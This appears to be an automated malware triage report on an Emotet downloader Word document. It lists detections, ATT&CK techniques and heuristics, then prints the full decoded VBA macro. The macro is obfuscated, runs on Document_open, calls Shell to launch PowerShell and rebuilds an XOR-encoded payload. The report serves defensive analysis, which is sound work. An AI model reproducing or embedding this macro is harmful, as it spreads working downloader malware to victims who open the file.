Verdict: MALICIOUS
Risk Score: 192

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7349880-0. Static analysis reveals the presence of VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, a common tactic for downloading and running further malicious content. The obfuscated nature of the VBA code suggests an effort to evade detection.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-7349880-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7349880-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched lines in script:
    zODYl = Nurdf - XwqYh / 41025 / jKNLuO - 223327908 + Hex(TWpskb) * ZQwXkj - Round(98221)
    ECQFzWdOfWj = vTEJwtGZPzn + VBA.Shell(AVzGGcXUcD + Chr(nzDAjD + vbKeyP + FoRuXfEEPTI) + "owers" + ErjNHiAdEtp + oAbEjchtH + TmLGnsb + ZasHTVZPfE, 9322 - 9322)
    NmCIJ = 2227 + qFwsDj + (96308 * CDbl(uBzluR) - lXBGHB / CSng(47093) - MjGGLd / Hex(OaiEYT) + 55366 - 91007)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
    End Function
    Private Sub Document_open()
    On Error Resume Next
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12755 bytes |

SHA-256: 347910f87200f340373ba871418a209c158194d40e79fc0d7b5ab5c7f1b3bd8a

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 211 of 390 identifiers look randomly generated (e.g. 'uIffDLrSHOJ') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "mQYlTssFXIz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ECQFzWdOfWj()
On Error Resume Next
oiGoYF = 59083 + OEaAfo + (52366 * CDbl(klOwA) - XcfSF / CSng(41707) - qmIWzi / Hex(sEzoaC) + 8926 - 94266)
LPQwvd = Sqr(31438)
TBBMvF = DOBJi
ksnLdI = AJEYS - djJnP / 61528 / ZXzwaB - 223327908 + Hex(DpZtM) * NmHqc - Round(28880)
dWMurl = 54941 + CLjLMw + (8567 * CDbl(ZSLAku) - GzQvsm / CSng(37664) - QNOsra / Hex(zqmGq) + 57212 - 63805)
TiEqKn = Sqr(94942)
soRzji = hjGIf
NilFub = kCicTz - DNQMTU / 27472 / DGZNwM - 223327908 + Hex(wJuSjA) * FUSYB - Round(3649)
iifhid = 94928 + ZiAOz + (87865 * CDbl(vtvTM) - vFMXa / CSng(65181) - WLZqSQ / Hex(apltXE) + 98083 - 67324)
MbYlj = Sqr(57682)
IANpV = rZzUcQ
ZJDMj = TJDvB - NIKvhO / 62996 / IBvHZ - 223327908 + Hex(nzwCw) * sHAjO - Round(7766)
DXuYN = 92568 + WlUNBw + (80725 * CDbl(GIdjdT) - lhLTFJ / CSng(83122) - zQKaIV / Hex(cTSRY) + 31338 - 1465)
odMZP = Sqr(2941)
BVbqcC = VJCjr
zODYl = Nurdf - XwqYh / 41025 / jKNLuO - 223327908 + Hex(TWpskb) * ZQwXkj - Round(98221)
ECQFzWdOfWj = vTEJwtGZPzn + VBA.Shell(AVzGGcXUcD + Chr(nzDAjD + vbKeyP + FoRuXfEEPTI) + "owers" + ErjNHiAdEtp + oAbEjchtH + TmLGnsb + ZasHTVZPfE, 9322 - 9322)
NmCIJ = 2227 + qFwsDj + (96308 * CDbl(uBzluR) - lXBGHB / CSng(47093) - MjGGLd / Hex(OaiEYT) + 55366 - 91007)
bfkDEi = Sqr(34478)
YbotI = RzFfDV
DaAfHD = sSVmMz - mCBmW / 6893 / tSJcMi - 223327908 + Hex(RVfiOi) * ldOHX - Round(77535)
lKIrC = 90146 + SbzqH + (94928 * CDbl(WAZnf) - PdnVSt / CSng(39539) - ijTNSA / Hex(rdlLMw) + 42455 - 70957)
HilYf = Sqr(85315)
Fzqjr = thBRL
OlMzI = nZJaw - sdcowa / 59672 / nbTBt - 223327908 + Hex(iNjHvw) * aEbGBk - Round(39617)
End Function
Private Sub Document_open()
On Error Resume Next
nSKFP = 85537 + pCiAt + (32822 * CDbl(AivqK) - bZhAGz / CSng(99711) - pSzwVG / Hex(JvvUc) + 31686 - 43042)
HBsbFi = Sqr(22150)
MBmBms = ftowAU
IqmsNl = wQsrA - jEYKIr / 74181 / ViRFZ - 223327908 + Hex(zOXuD) * ZpGiND - Round(45853)
mHVnnM = 22276 + swnWKr + (96032 * CDbl(wETBDR) - sjKwCu / CSng(12518) - PFjCwN / Hex(PLZMLl) + 71543 - 99250)
jziUs = Sqr(39143)
wEjZWP = wURznY
pVIdD = NJplBY - iozbV / 79888 / brFNH - 223327908 + Hex(FODPlD) * hrhpkW - Round(72212)
ECQFzWdOfWj
zQvWUY = 97357 + aAwcj + (75762 * CDbl(JrzDJ) - VfitB / CSng(59443) - DMmAi / Hex(tQuOCN) + 99269 - 18756)
akkwmn = Sqr(80005)
QWajNi = uzCwDM
zzDkb = QcStiC - Nztwt / 82132 / cwqJB - 223327908 + Hex(FtJDr) * NBnBiB - Round(34074)
iCIuiC = 61746 + TPBzo + (23181 * CDbl(vOwbK) - qMXouq / CSng(84730) - SCwkn / Hex(ktkTP) + 99289 - 14669)
URXSW = Sqr(75631)
imjTVG = MnqAtw
cDRlor = kFnMoQ - MDNBt / 78781 / ddMLd - 223327908 + Hex(sFRcT) * Oqzhw - Round(97823)
End Sub
Attribute VB_Name = "uIffDLrSHOJ"
Function ErjNHiAdEtp()
On Error Resume Next
fUWBt = Sqr(39882)
tXQRTw = WMdmL - StmujD / 49386 / FsufHv - 223327908 + Hex(OkwDTU) * cSzSKs - Round(3620)
TZpjUF = JiSOj
CuFTd = 68739 + tLtUJS + (23759 * CDbl(RkvzRz) - cjGAz / CSng(78020) - sziOl / Hex(JYfCD) + 72703 - 80220)
IKMJTQjM = "HeLL &" + "( $EnV:CoMspec" + "[4,2" + "4,25]-JOIn'')" + "(-jOI" + "n ( '112D0w61m3" + "9m" + "34j23F1" + "16S105S"
uWUOdI = Sqr(95316)
GBKqj = wJbTB - SrITW / 73090 / lJzza - 223327908 + Hex(VEiqRi) * QKOJn - Round(12524)
YQaIq = ibVqvw
iVlLDU = 14268 + firNTR + (38568 * CDbl(NshrmU) - FzFLjI / CSng(55842) - YVKzz / Hex(HHXup) + 87985 - 65260)
dYZYQHI = "116" + "j58,49m35m1" + "21S59&54D6" + "2{49{" + "55S32{116F38" + "!53S58&" + "48w" + "59j57S111,112" + "w17&6"
tvKjKI = Sqr(18449)
PUbkrk = fcBLG - vciBO / 1714 / XtcEm - 223327908 + Hex(hATuX) * uaEWwC - Round(51322)
vJNTVr = RDOAr
CMEJEk = 89126 + HPSJo + (63577 * CDbl(HcwfQ) - Kbvdb / CSng(66307) - EBUqan / Hex(DGFFD) + 23397 - 38527)
zjLiWiBjjzn = ",32!6,27&50{11" + "6&105{116&58" + "m49S35,121m59{" + "54,62m49F" + "55S32{11" + "6!7" + "S45,39F32,49" + "S5"
uYQCC = Sqr(15233)
rfIZF = GRUYh - aUSCR / 48745 / IcIui - 223327908 + Hex(NkVBm) * lbVAj - Round(36242)
zZcCB = iwSbf
HICWsX = 95779 + CIMid + (69650 * CDbl(fqGjz) - iCwQaC / CSng(48818) - jhsPbT / Hex(XidbEE) + 30620 - 80156)
RRMahVfs = "7!122S26" + "{49m32w122&3F49" + "{54S23!56F61&" + "49{58&32&111{11" + "2S36&21S4!62w0j" + "39m116,1" + "05&11" + "6{115" + "w60F32m" + "32m36&11"
ErjNHiAdEtp = IKMJTQjM + dYZYQHI + zjLiWiBjjzn + RRMahVfs
End Function
Function oAbEjchtH()
On Error Resume Next
ZfaEKZ = Sqr(86964)
cjHUTj = Nlucr - wGHQTD / 70350 / lFpoUb - 223327908 + Hex(lRnSAt) * KiHSh - Round(52776)
jTcMHj = wPtcV
cvzjjl = 49441 + sTkPi + (2104 * CDbl(rFTijX) - ofQAOL / CSng(41662) - rtjmup / Hex(lQwtmn) + 98349 - 84048)
AawmhdGff = "0D12" + "3F123F35S35,3" + "5&1" + "22!55" + ",59j58F39D49D3" + "6w32&36{38j59" + ",62S49{122F55j"
JVqdu = Sqr(60987)
zzkGRA = rJdKrJ - zsTOJ / 63492 / wVIFaE - 223327908 + Hex(mHhXzH) * rMMOPj - Round(54253)
AtWAMd = ToqVI
riSjzH = 76454 + UGJrqm + (91379 * CDbl(IAVJL) - MSnHwK / CSng(35028) - wzrzSj / Hex(bTZnD) + 60763 - 73497)
Hzvhz = "59w57D123m5" + "6S25j5{4" + "5!13&" + "2S17w98w97m123" + "m20!60D3" + "2m32D36S11" + "0F12" + "3!"
OGtZl = Sqr(2552)
POrACY = Nitrs - QczwDV / 88527 / vdZciQ - 223327908 + Hex(IYYSUL) * EuzwV - Round(90127)
KsncA = dWOlw
DicAr = 91573 + FBvmu + (5372 * CDbl(HjHAt) - FfLPRz / CSng(7354) - IlTmw / Hex(tNjLWT) + 41229 - 44553)
wXhuZ = "123,3" + "5D35w35D12" + "2m49&56!55" + "{59!57F122w"
HCEqE = Sqr(25742)
wNQIZ = kUZNr - DiTYL / 48130 / EcZjla - 223327908 + Hex(zsvuQ) * zAdok - Round(8888)
dccda = lGwVQH
UlSYU = 15452 + FKVZY + (69990 * CDbl(YFwHzz) - SAzzHQ / CSng(21173) - bCBML / Hex(TcZbN) + 46923 - 32116)
GfGwNmQldvo = "63m51,123j34!" + "96m29w1" + "09&" + "61{" + "102w1" + "09F16!12"
VRrzLj = Sqr(18595)
liRnDw = PTTon - czdZZ / 97869 / hjRzf - 223327908 + Hex(EAXOli) * aPVkBZ - Round(13665)
ziIzOW = Nknis
LIYYh = 59567 + PCsYiw + (58990 * CDbl(CEinH) - uVUZSP / CSng(26603) - OFRBzB / Hex(cFHFXV) + 93206 - 81942)
JViBY = "3w2" + "0&60S32j32" + "F36F110{" + "123"
UCLuft = Sqr(41010)
kpJSW = ijIijj - iEjQz / 36580 / dtizth - 223327908 + Hex(mPPjmn) * OLwwrL - Round(73840)
qDCIDb = UOZlhn
CMTHS = 88363 + sEiFr + (64351 * CDbl(btXAr) - rjPpbJ / CSng(22775) - IozBIQ / Hex(IQtHN) + 57864 - 95866)
JmMCjd = "&123m" + "35!35{3" + "5{122w96F59m33!" + "32&48!" + "59&59,38S122{5" + "8!49S32S123!99" + "{45,50F96&50{7{"
FSEqL = Sqr(46758)
CIwLF = qsBcGC - BQwszr / 10990 / vSoWHM - 223327908 + Hex(qkwabt) * EapijL - Round(34001)
wfuOi = zcdjZs
rKKYp = 3364 + QsBzvd + (37349 * CDbl(lRHHqQ) - zEfwJp / CSng(76182) - zMuNXA / Hex(aCKvzG) + 55939 - 94504)
LVHZzZ = "17!6" + "S123j20S60" + "D32,32S36F110w" + "12" + "3m123j57S49" + "!56w59F58j48" + "w61S39&55," + "122j55,5" + "9D1" + "22"
TAUIcB = Sqr(16774)
JYqFrS = Clthrc - RUYzCC / 58798 / jPZKV - 223327908 + Hex(bmcSQZ) * kjfXAH - Round(66464)
UzaMRo = LtUSW
pHozj = 95763 + Rfjar + (16958 * CDbl(VDPKu) - Bwpvvv / CSng(9020) - ZDGIX / Hex(OSAkAN) + 30436 - 54161)
iJDCRNU = "w32F60" + "w123S96S16D" + "102S25m56j27&12" + "3w20{60S32&3" + "2F36m110j123j" + "123!55F39{" + "58D39m49S3" + "8w34S49F38" + "{1" + "22w"
PBLrE = Sqr(92915)
DDiuq = UlwzTu - dhnjt / 70513 / mnhINj - 223327908 + Hex(NKQJtX) * WtOKIG - Round(66810)
UikLt = zkiwGz
rbfhww = 50889 + QObDdj + (77489 * CDbl(aCvwwM) - pwcMcB / CSng(95106) - KZwtE / Hex(pDJIOD) + 37183 - 16433)
PYziMu = "55m59&57D123" + "&99&31D13!34{5" + "6{39D62&61m10" + "3D123S115&122" + "!7m36" + "w56m61j3" + "2S124w115F" + "20&11" + "5!125!111m112j" + "62,2j59w60!50S2"
oAbEjchtH = AawmhdGff + Hzvhz + wXhuZ + GfGwNmQldvo + JViBY + JmMCjd + LVHZzZ + iJDCRNU + PYziMu
End Function
Function TmLGnsb()
On Error Resume Next
bdJBYY = Sqr(89386)
CNpjKl = zrTjc - sbBvrA / 31248 / vkRpSC - 223327908 + Hex(OnQlkH) * zjuQVR - Round(89172)
JRkYr = iObwTw
PWWjJ = 88167 + bhnaW + (34907 * CDbl(nZZki) - OiQYp / CSng(80600) - fwoLZ / Hex(aGXsiz) + 24384 - 52995)
dKvjLDtdH = "5m11" + "6&105&116w1" + "12m0w" + "61" + "w39" + "{3" + "4j23D122D58!"
iHucXr = Sqr(8473)
sfUzY = BrPidW - klWbI / 11714 / DtAbZa - 223327908 + Hex(hFqNO) * dVaffz - Round(53721)
jczRjB = FhXiH
cYrsj = 37065 + DCwrWG + (57677 * CDbl(Bbfwm) - EopAT / CSng(71388) - hjNGA / Hex(VLDYmw) + 21485 - 67057)
hkQjmoOrvic = "49{44&32&1" + "24w" + "101{120{11" + "6F97D96&"
vSSVfL = Sqr(62846)
CHIjc = zMhJIF - VmWOsP / 10072 / MbPcao - 223327908 + Hex(utkzAk) * WOutAn - Round(85368)
jWQhM = uWYBO
FCzfta = 94710 + TmZUP + (87704 * CDbl(OKrwLi) - WWkuNP / CSng(30631) - hpwdX / Hex(WvmFzC) + 64263 - 88847)
OvQbUohqS = "96S102D98w" + "98m" + "125&111F" + "112F36{6F57w"
AQonn = Sqr(66240)
PzzCQ = rcUBaF - dUZmdH / 38318 / YOOaC - 223327908 + Hex(OiKwJ) * PHHtT - Round(48751)
tZpMZ = wHmwbN
fsECGX = 35669 + YIEAZQ + (15640 * CDbl(wOSwt) - qnOOvw / CSng(73537) - CZWFqV / Hex(ruPZfU) + 31590 - 69958)
MtkimPwod = "54,3{61,116S105" + ",116w112" + "w49m58j" + "34j110&3"
pvbcZ = Sqr(78599)
TKiFd = rWzOMP - vJBOn / 60127 / EnVbs - 223327908 + Hex(rZXJsq) * IOdai - Round(98594)
CnFdt = EijqB
jOHqi = 67312 + NldzKC + (32695 * CDbl(PWMjTE) - RPTkU / CSng(30042) - UinIod / Hex(IRZKr) + 21830 - 36524)
puOpiw = "2S49D57m36&1" + "16w127" + "j116j115w8m1" + "15D116F127{116" + "m112j62w2j59&" + "60F50"
naJouw = Sqr(99187)
jzXrw = PLPMs - VqRaf / 12663 / rHKjTs - 223327908 + Hex(YzmIn) * uLQEY - Round(70343)
Qubwf = CiftMo
hHjoHM = 88348 + SzoVV + (12875 * CDbl(jjbjo) - qKLZv / CSng(95234) - NtdzEv / Hex(BioTVF) + 5263 - 96911)
howMfmj = "S25D11" + "6m127!116j115" + "j12" + "2!49S44w49!11" + "5w111" + "m50&" + "59!38j4" + "9S53j55{60"
QJizT = Sqr(62656)
QWvhPm = qKRat - sVZWHZ / 27441 / JfajId - 223327908 + Hex(IREWd) * ZFvUj - Round(25757)
NZHGs = ZawIj
nzHKW = 32041 + whwPZ + (12674 * CDbl(diKaN) - uBkRA / CSng(8345) - JSpbqC / Hex(zPmAun) + 40200 - 72450)
NQCbUGM = ",124" + "!112S48F29,18&" + "14j38m5!116" + "j61F58&" + "116{112,36m21m" + "4{62S0m39,"
OwPJK = Sqr(92243)
fGJUi = GlnIv - JUKmA / 53278 / oAADi - 223327908 + Hex(HHiYnD) * HltRws - Round(88873)
wpcNb = fvkLs
SCGqVB = 12281 + uhtMD + (31382 * CDbl(TPiCX) - NwUCN / CSng(10544) - wZXGM / Hex(KUSPaT) + 56759 - 9928)
XAtZE = "125,47m32!38D" + "45{47&112F17,6" + "D32&6F27{50!122" + "!16j59&3" + "5{58{56," + "59m53m48{18" + ",61" + "!56D49F124&1" + "12F48F2"
TmLGnsb = dKvjLDtdH + hkQjmoOrvic + OvQbUohqS + MtkimPwod + puOpiw + howMfmj + NQCbUGM + XAtZE
End Function
Function ZasHTVZPfE()
On Error Resume Next
UbOWfW = Sqr(19586)
THzGj = GQPHPZ - zchMuw / 23010 / TqOokw - 223327908 + Hex(XonoMT) * PWhTjI - Round(95630)
OhcSX = vlDJPh
HMfCa = 50791 + wYMAEB + (90581 * CDbl(atpIh) - aSYlLT / CSng(22812) - iPXWo / Hex(ZOOWR) + 37052 - 19606)
SWnCIvmT = "9&1" + "8m14m3" + "8j5j122!0D59D7D" + "32D3" + "8{61j58w51,12" + "4,1"
VVmUj = Sqr(18912)
uznlb = HTMBz - JwnFO / 51129 / DhFcj - 223327908 + Hex(jjTGLW) * sKTnJN - Round(17341)
KEkvW = jKkYwj
RlSwuK = 86924 + TaMaBM + (21724 * CDbl(bSDjMf) - Dobzr / CSng(57609) - QOnww / Hex(PXlwEf) + 83217 - 57596)
HUjwjvZ = "25D120&116" + ",112D36w" + "6&57{54D3!61j" + "125,111F" + "7!32F53F38&32" + "{121{4,38F59" + "m55," + "49j39D39F1" + "16j112,36!6!5" + "7j54S3D61{111&"
jCVuj = Sqr(37832)
cDSIV = IjjbDW - DSlMz / 65638 / kEvLKj - 223327908 + Hex(OKqLB) * QzdTd - Round(19025)
QRlCi = UZiPXu
GYoXG = 94113 + ioMAfz + (45614 * CDbl(izwARN) - PTZzNL / CSng(13129) - qncjmm / Hex(QCQNSb) + 9289 - 70746)
GZjzsq = "54!38&49" + "&53" + "j6" + "3m111,41!55j53" + "D32&55{60F"
bViaQb = Sqr(1463)
FmZkwD = VaNzf - wDCTd / 38839 / CRqCt - 223327908 + Hex(dStkRV) * GKNXtc - Round(33599)
thdqX = XUQRJv
ZnYIG = 95907 + vuYtPC + (99448 * CDbl(EpRipO) - CaEnc / CSng(22192) - zthQzz / Hex(aVMjXX) + 97136 - 17576)
UqkkoBN = "47" + "S35F38w61" + "m32w49m121" + "F60w59m39!32" + "S116F112,1" + "1D122!17F44&55" + "m49{36m" + "32&61" + "F59w58!1"
PZrRo = Sqr(54593)
hlEmj = PVapa - NMPNr / 46290 / YdXjL - 223327908 + Hex(IMRcY) * MXMwt - Round(18561)
KzKAdX = SfHmHw
ovXqH = 51363 + bpvbm + (11472 * CDbl(piaBCK) - UjBPSA / CSng(391) - dfOvh / Hex(RACUq) + 86736 - 67480)
zGjJlL = "22m" + "25j" + "49!39m39!" + "53w51&49" + "w1" + "11&41w41" + "'.SpLI" + "t('mSDF{j&!,w')" + " | ForeACH"
wDlaqC = Sqr(30664)
fdHRX = hYODz - kqjcci / 47829 / Ldhnt - 223327908 + Hex(RSNVLs) * SloJG - Round(68297)
BDBfc = QsVvzL
tXDXJE = 85933 + XHwtB + (78907 * CDbl(cAPWD) - WNWwvB / CSng(90989) - nQRQY / Hex(pTpmo) + 32627 - 77705)
wJNONPL = "{ [CHAr] " + "( $_ -BXoR" + " '0x54'" + ") } ))"
ZasHTVZPfE = SWnCIvmT + HUjwjvZ + GZjzsq + UqkkoBN + zGjJlL + wJNONPL
End Function